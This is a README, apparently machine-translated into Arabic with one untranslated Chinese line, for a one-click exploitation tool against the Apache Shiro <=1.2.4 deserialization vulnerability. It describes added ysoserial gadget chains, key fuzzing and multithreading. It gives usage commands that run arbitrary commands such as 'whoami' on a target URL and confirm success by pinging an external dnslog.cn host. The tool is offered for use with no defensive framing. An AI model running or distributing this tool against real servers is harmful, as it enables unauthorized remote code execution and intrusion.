
shiro 1.2.47 إلغاء التسلسل
أداة كشف بضغطة واحدة لثغرة إلغاء التسلسل Shiro<=1.2.4
التغييرات: 1. تمت إضافة 4 وحدات جديدة لسلاسل الاستغلال (CommonsCollections7-10)، ومن المتوقع أن تزيد نسبة النجاح بنسبة 30%، وتم تجميعها في حزمة jar الجديدة من ysoserial، يرجى عدم استبدالها
التغييرات: 2. تمت إضافة تعدد الخيوط (multithreading)، وعلى الرغم من زيادة الوحدات إلا أن السرعة زادت بنسبة 300%
集成21个key进行fuzz
إذا كان مفيدًا لك، فيرجى الضغط على نجمة (star)، المقالة المقابلة في المدونة: http://www.svenbeast.com/post/tskRKJIPg/
pip3 install -r requirments.txt
الاستخدام: python3 shiro.py url command
الاستخدام: python3 shiro.py https://url.com whoami
http://www.dnslog.cn/ يُنصح باستخدام منصة dnslog هذه للتحقق، فهي أسرع بكثير من ceye.io
تذكّر أن تضع علامتي اقتباس "" حول الأوامر التي تحتوي على مسافات
الاستخدام: python3 shiro.py http://url.com "ping dnslog.cn"
قم بتشغيل جميع الوحدات الـ 11 كاملة، ثم اذهب إلى منصة dnslog لمعرفة ما إذا تم استلام الطلب، إذا لم يظهر فقد انتهى الأمر (GG)، وقد يكون السبب هو أن الترميزات غير كافية بعد
يرجى جمع الترميزات بنفسك، ويمكنك إضافة الدوال بنفسك في الكود المصدري الموجود تحت moule
لتبسيط تشغيل السكريبت، عدد الخيوط لا يتحكم فيه المستخدم عبر تمرير المعاملات، الافتراضي هو 20 خيطًا، وإذا أردت تغييره فانتقل إلى السطر 20 في /moule/main.py وقم بتعديل معامل التحكم في الخيوط بنفسك